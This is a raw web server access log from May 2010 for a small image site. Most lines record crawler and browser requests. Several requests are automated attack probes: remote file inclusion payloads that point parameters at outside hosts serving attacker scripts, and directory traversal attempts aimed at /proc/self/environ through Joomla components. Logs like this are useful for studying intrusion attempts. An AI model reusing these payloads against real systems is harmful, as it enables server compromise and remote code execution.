87.250.255.243 - - [07/May/2010:19:02:08 -0500] "GET /logs/access_log.1246147200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [07/May/2010:19:02:50 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.87 - - [07/May/2010:19:04:21 -0500] "GET /logs/access_log.1185580800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [07/May/2010:19:05:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [07/May/2010:19:12:22 -0500] "GET /logs/access_log.1247443200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
12.197.217.140 - - [07/May/2010:19:14:57 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:57 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:57 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:57 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:57 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:57 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:58 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:58 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:58 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:58 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:58 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:58 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:59 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:59 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:59 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:59 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:59 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:59 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:14:59 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:15:00 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:15:00 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:15:00 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:15:00 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:15:00 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:15:00 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:15:00 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
12.197.217.140 - - [07/May/2010:19:15:01 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
220.130.208.19 - - [07/May/2010:19:20:26 -0500] "GET ////////?mosConfig_absolute_path=http://raml.interfree.it/id.jpg?? HTTP/1.1" 200 1009 "-""libwww-perl/5.65"
220.130.208.19 - - [07/May/2010:19:20:27 -0500] "GET /logs////////?mosConfig_absolute_path=http://raml.interfree.it/id.jpg?? HTTP/1.1" 200 4760 "-""libwww-perl/5.65"
184.73.16.1 - - [07/May/2010:19:21:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.16.1 - - [07/May/2010:19:21:00 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.16.1 - - [07/May/2010:19:21:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.16.1 - - [07/May/2010:19:21:19 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.16.1 - - [07/May/2010:19:21:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.16.1 - - [07/May/2010:19:21:44 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.16.1 - - [07/May/2010:19:22:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.16.1 - - [07/May/2010:19:22:03 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
87.250.255.243 - - [07/May/2010:19:26:09 -0500] "GET /logs/access_log.1245542400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.251.10.117 - - [07/May/2010:19:26:15 -0500] "GET ///index.php?opton=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
64.251.10.117 - - [07/May/2010:19:28:23 -0500] "GET /logs/access_log.1272067200///index.php?opton=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
64.251.10.117 - - [07/May/2010:19:28:23 -0500] "GET ///index.php?opton=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
64.251.10.117 - - [07/May/2010:19:28:23 -0500] "GET /logs///index.php?opton=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
64.251.10.117 - - [07/May/2010:19:29:52 -0500] "GET /logs/access_log.1272067200///index.php?opton=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
64.251.10.117 - - [07/May/2010:19:29:52 -0500] "GET ///index.php?opton=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
64.251.10.117 - - [07/May/2010:19:29:52 -0500] "GET /logs///index.php?opton=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
64.251.10.117 - - [07/May/2010:19:35:47 -0500] "GET ///index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
67.195.112.180 - - [07/May/2010:19:37:11 -0500] "GET /logs/access_log.1219190400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
189.108.172.26 - - [07/May/2010:19:37:23 -0500] "GET /?sourcedir=http://www.bmbath.com/bbs/data/gongji/copyright.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
189.108.172.26 - - [07/May/2010:19:37:23 -0500] "GET /logs/?sourcedir=http://www.bmbath.com/bbs/data/gongji/copyright.txt???? HTTP/1.1" 200 4749 "-""Mozilla/5.0"
189.108.172.26 - - [07/May/2010:19:37:23 -0500] "GET /logs/access_log.1263168000/?sourcedir=http://www.bmbath.com/bbs/data/gongji/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
189.108.172.26 - - [07/May/2010:19:37:26 -0500] "GET /logs/access_log.1263772800/?sourcedir=http://www.bmbath.com/bbs/data/gongji/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.251.10.117 - - [07/May/2010:19:38:07 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
64.251.10.117 - - [07/May/2010:19:38:07 -0500] "GET ///index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
64.251.10.117 - - [07/May/2010:19:38:07 -0500] "GET /logs///index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
87.250.255.243 - - [07/May/2010:19:38:13 -0500] "GET /logs/access_log.1235865600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [07/May/2010:19:50:15 -0500] "GET /logs/access_log.1220832000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
189.108.172.26 - - [07/May/2010:19:50:17 -0500] "GET /logs/access_log.1266537600/ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.bmbath.com/bbs/data/gongji/copyright.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
189.108.172.26 - - [07/May/2010:19:50:17 -0500] "GET /logs/ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.bmbath.com/bbs/data/gongji/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
189.108.172.26 - - [07/May/2010:19:50:17 -0500] "GET /ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.bmbath.com/bbs/data/gongji/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [07/May/2010:20:02:18 -0500] "GET /costume/thmb4.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.131 - - [07/May/2010:20:10:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.204.178 - - [07/May/2010:20:10:21 -0500] "GET /logs/access_log.1184889600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [07/May/2010:20:11:12 -0500] "GET /logs/access_log.1237852800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.129.119.42 - - [07/May/2010:20:13:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
222.236.47.182 - - [07/May/2010:20:14:18 -0500] "GET //zipndownload.php?PP_PATH=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:14:18 -0500] "GET /logs/access_log.1244592000//zipndownload.php?PP_PATH=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:14:18 -0500] "GET /logs/access_log.1265587200//zipndownload.php?PP_PATH=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:14:18 -0500] "GET /logs//zipndownload.php?PP_PATH=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
87.250.255.243 - - [07/May/2010:20:14:21 -0500] "GET /logs/access_log.1249344000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
222.236.47.182 - - [07/May/2010:20:14:42 -0500] "GET /logs//zipndownload.php?PP_PATH=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:14:42 -0500] "GET /logs/access_log.1265587200//zipndownload.php?PP_PATH=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:14:42 -0500] "GET //zipndownload.php?PP_PATH=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:14:42 -0500] "GET /logs/access_log.1244592000//zipndownload.php?PP_PATH=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.218.116.133 - - [07/May/2010:20:19:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.130 - - [07/May/2010:20:20:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.11 - - [07/May/2010:20:20:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
222.236.47.182 - - [07/May/2010:20:21:26 -0500] "GET //sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:21:26 -0500] "GET /logs//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:21:33 -0500] "GET /logs/access_log.1270857600//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:21:49 -0500] "GET //sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:21:49 -0500] "GET /logs//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:21:49 -0500] "GET /logs/access_log.1270857600%20%20//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
67.218.116.164 - - [07/May/2010:20:22:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
222.236.47.182 - - [07/May/2010:20:22:18 -0500] "GET /logs/access_log.1270857600%20%20//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:22:18 -0500] "GET /logs/access_log.1264204800//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:22:51 -0500] "GET /logs/access_log.1270857600//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:22:52 -0500] "GET /logs/access_log.1264204800//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:23:02 -0500] "GET /logs/access_log.1265673600//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:20:23:36 -0500] "GET /logs/access_log.1265673600//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
67.218.116.132 - - [07/May/2010:20:23:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [07/May/2010:20:24:14 -0500] "GET /logs/access_log.1239494400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.163 - - [07/May/2010:20:26:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.40 - - [07/May/2010:20:28:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.44 - - [07/May/2010:20:29:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.44 - - [07/May/2010:20:30:46 -0500] "GET /logs/access_log.1211673600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.43 - - [07/May/2010:20:31:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.13 - - [07/May/2010:20:32:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [07/May/2010:20:32:53 -0500] "GET /logs/access_log.1236470400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.41 - - [07/May/2010:20:34:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.14 - - [07/May/2010:20:34:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.162 - - [07/May/2010:20:37:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.166 - - [07/May/2010:20:37:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.10 - - [07/May/2010:20:38:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.165 - - [07/May/2010:20:41:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [07/May/2010:20:41:31 -0500] "GET /logs/access_log.1248048000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.96 - - [07/May/2010:20:44:21 -0500] "GET /logs/access_log.1181779200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.12 - - [07/May/2010:20:46:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.204.238 - - [07/May/2010:20:47:20 -0500] "GET /logs/access_log.1261353600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.134 - - [07/May/2010:20:47:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [07/May/2010:20:51:53 -0500] "GET /logs/access_log.1254700800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
83.69.115.198 - - [07/May/2010:20:53:11 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:20:53:12 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:20:53:12 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:20:54:13 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:20:54:21 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:20:54:37 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:20:54:37 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:20:54:37 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
72.26.122.245 - - [07/May/2010:21:00:39 -0500] "GET /logs/index.php?meio.php=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.26.122.245 - - [07/May/2010:21:00:39 -0500] "GET /logs/access_log.1263081600/index.php?meio.php=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.26.122.245 - - [07/May/2010:21:00:39 -0500] "GET /index.php?meio.php=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:21:00:50 -0500] "GET /logs/access_log.1262822400//showthread.php?tid=86/index.php?kobr=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:21:00:50 -0500] "GET //showthread.php?tid=86/index.php?kobr=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:21:00:50 -0500] "GET /logs//showthread.php?tid=86/index.php?kobr=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:21:00:50 -0500] "GET /logs/access_log.1264032000//showthread.php?tid=86/index.php?kobr=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
